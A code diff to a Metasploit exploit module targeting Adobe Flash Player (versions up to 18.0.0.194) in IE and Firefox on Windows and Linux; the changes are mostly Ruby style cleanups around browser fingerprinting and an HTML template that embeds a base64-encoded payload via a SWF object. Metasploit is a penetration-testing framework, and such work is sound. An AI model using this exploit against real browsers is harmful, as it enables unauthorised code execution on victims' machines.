@@ -40,19 +40,18 @@ class MetasploitModule < Msf::Exploit::Remote
         'Payload' => {
           'DisableNops' => true
         },
-        'Platform' => ['win', 'linux'],
         'Arch' => [ARCH_X86],
         'BrowserRequirements' => {
-          :source => /script|headers/i,
-          :arch => ARCH_X86,
-          :os_name => lambda do |os|
+          source: /script|headers/i,
+          arch: ARCH_X86,
+          os_name: lambda do |os|
             os =~ OperatingSystems::Match::LINUX ||
               os =~ OperatingSystems::Match::WINDOWS_7 ||
               os =~ OperatingSystems::Match::WINDOWS_81 ||
               os =~ OperatingSystems::Match::WINDOWS_VISTA ||
               os =~ OperatingSystems::Match::WINDOWS_XP
           end,
-          :ua_name => lambda do |ua|
+          ua_name: lambda do |ua|
             case target.name
             when 'Windows'
               return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
@@ -62,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
             false
           end,
-          :flash => lambda do |ver|
+          flash: lambda do |ver|
             case target.name
             when 'Windows'
               return true if Rex::Version.new(ver) <= Rex::Version.new('18.0.0.194')
@@ -120,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit_template(cli, target_info)
-    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    swf_random = "#{rand_text_alpha(rand(4..6))}.swf"
     target_payload = get_payload(cli, target_info)
     b64_payload = Rex::Text.encode_base64(target_payload)
 
@@ -130,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
       platform_id = 'linux'
     end
 
-    html_template = %Q|<html>
+    html_template = %(<html>
     <body>
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
@@ -141,9 +140,9 @@ class MetasploitModule < Msf::Exploit::Remote
     </object>
     </body>
     </html>
-    |
+    )
 
-    return html_template, binding()
+    return html_template, binding
   end
 
   def create_swf
